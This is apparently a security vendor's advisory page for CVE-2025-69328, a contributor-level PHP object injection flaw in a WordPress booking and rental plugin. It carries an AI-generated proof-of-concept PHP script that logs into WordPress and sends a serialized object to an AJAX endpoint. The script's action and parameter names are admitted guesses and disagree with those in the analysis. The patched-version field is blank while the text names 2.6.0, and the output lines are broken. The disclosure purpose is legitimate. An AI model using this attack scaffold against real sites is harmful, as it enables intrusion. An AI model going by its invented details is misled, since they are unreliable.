Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-69328: Booking and Rental Manager <= 2.5.9 – Authenticated (Contributor+) PHP Object Injection (booking-and-rental-manager-for-woocommerce)

CVE ID CVE-2025-69328
Plugin booking-and-rental-manager-for-woocommerce
Severity High (CVSS 7.5)
CWE 502
Vulnerable Version 2.5.9
Patched Version
Disclosed February 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69328 (metadata-based):
This vulnerability is an authenticated PHP object injection flaw in the Booking and Rental Manager plugin for WordPress. Attackers with contributor-level access or higher can exploit deserialization of untrusted input. The CVSS 7.5 score reflects a high-impact attack that requires high attack complexity and low-privilege access.

Atomic Edge research infers the root cause is insecure deserialization (CWE-502). The plugin likely passes user-controlled data to an unserialize() function without prior validation. This conclusion is inferred from the CWE classification and the vulnerability description. No source code confirms the exact location, but the pattern matches common WordPress plugin flaws where serialized data from POST parameters or cookies is processed.

The exploitation method likely involves a POST request to the WordPress AJAX handler. An attacker with a valid contributor session would send a crafted serialized object to a specific plugin action. The payload would be placed in a vulnerable parameter, such as ‘data’ or ‘settings’. The exact AJAX action name is unknown but can be inferred from the plugin slug, potentially like ‘booking_and_rental_manager_action’.

Remediation requires replacing the insecure unserialize() call with a safe alternative. The patched version 2.6.0 likely implements proper input validation, such as using json_decode() with a schema check or a PHP-native safe deserialization library. The fix must also include capability checks on the affected endpoint.

Successful exploitation could lead to arbitrary file deletion, sensitive data retrieval, or remote code execution if a suitable POP chain (property-oriented programming) exists. The impact depends on available gadget chains in the plugin, other installed plugins, or the WordPress core. Without a POP chain, the vulnerability may still cause application crashes or limited data exposure.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-69328 - Booking and Rental Manager <= 2.5.9 - Authenticated (Contributor+) PHP Object Injection
<?php
// CONFIGURATION
$target_url = 'https://target.site/wp-admin/admin-ajax.php'; // Change this
$username = 'contributor_user'; // Attacker's username
$password = 'contributor_pass'; // Attacker's password
$action = 'booking_and_rental_manager_save_settings'; // INFERRED AJAX action name
$vuln_param = 'serialized_data'; // INFERRED vulnerable parameter name

// This PoC demonstrates authentication and payload delivery.
// A functional exploit requires a viable POP chain object, which is not provided here.
// The serialized payload is a placeholder generic object.
$placeholder_payload = serialize(new stdClass());
$placeholder_payload = str_replace('O:8:"stdClass":0:{}', 'O:8:"stdClass":1:{s:4:"test";s:5:"dummy";}', $placeholder_payload);

// Step 1: Authenticate to WordPress and obtain session cookies.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => str_replace('admin-ajax.php', 'wp-login.php', $target_url),
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query(['log' => $username, 'pwd' => $password, 'wp-submit' => 'Log In']),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR => '/tmp/cookies.txt', // Save session cookies
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_HEADER => true
]);
$login_response = curl_exec($ch);
curl_close($ch);

// Step 2: Send the malicious AJAX request with serialized payload.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query(['action' => $action, $vuln_param => $placeholder_payload]),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEFILE => '/tmp/cookies.txt', // Use saved session
    CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
]);
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 3: Output result.
echo "HTTP Code: $http_coden";
echo "Response: $ajax_responsen";
// A successful exploitation attempt might cause a different HTTP code or error.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School